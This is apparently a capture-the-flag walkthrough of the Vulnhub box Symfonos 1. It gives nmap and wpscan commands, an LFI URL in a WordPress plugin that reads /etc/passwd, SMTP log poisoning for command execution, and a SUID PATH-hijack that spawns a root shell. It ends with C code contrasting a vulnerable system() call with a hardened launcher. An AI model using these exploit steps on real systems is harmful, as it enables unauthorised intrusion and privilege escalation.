Vulnhub – Symfonos 1 Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.11 -vv

The host is running an SMB service, so we can scan it and list the shares:

So we got a file named attention.txt:

We can now log in with the username helios and one of these passwords, which turns out to be qwerty (after testing each one):

Let’s download these two files research.txt and todo.txt:

The new path /h3l105 is a WordPress site; also change the hosts file to add symfonos.local.

wpscan --url http://192.168.1.11/h3l105/ -e p


It says that directory listing is enabled on the upload directory, so we check it out and find 3 subdirectories:

So I googled it and I found an exploit for it:

The exploit is an LFI (local file inclusion) request, which we use to display the /etc/passwd file:

http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

OK, at this point: back when I was doing enumeration, port 25 was open and had no use until now, so we can use the SMTP log poisoning method:

Then we put this line in the address:

view-source:http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id

And we get something like this:

Now to get a shell we put this command:

Let’s use “find” to find SUID files: find / -perm -u=s -type f 2>/dev/null

There is a file /opt/statuscheck that we can abuse through its use of PATH (path abuse):

cd /tmp

echo "/bin/sh" > curl

chmod 777 curl

echo $PATH

export PATH=/tmp:$PATH

/opt/statuscheck
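
The last step works because a SUID program that launches curl by bare name lets the caller's PATH decide which file runs. The following is an added example, not code from the original post or from the box's binary, showing that pattern beside a hardened launcher. The curl arguments, the /usr/bin/curl location and the function names are assumptions.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed vulnerable pattern: system() hands the string to /bin/sh, which
 * looks up the bare name "curl" in the caller-controlled PATH. In a SUID
 * program that lookup happens with the file owner's privileges. */
int status_check_vulnerable(void) {
    return system("curl -I http://localhost"); /* constructed arguments */
}

/* Fixed environment given to the child; nothing is inherited from the caller. */
static const char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Hardened launcher: absolute path only, no shell, fixed environment.
 * Returns the child's exit code, or -1 if the request is refused or fails. */
int run_fixed(const char *abs_path, char *const argv[]) {
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                  /* refuse anything needing a PATH search */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, (char *const *)SAFE_ENV);
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* /usr/bin/curl is an assumed install location */
    char *argv[] = { "curl", "-I", "http://localhost", NULL };
    return run_fixed("/usr/bin/curl", argv);
}
```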
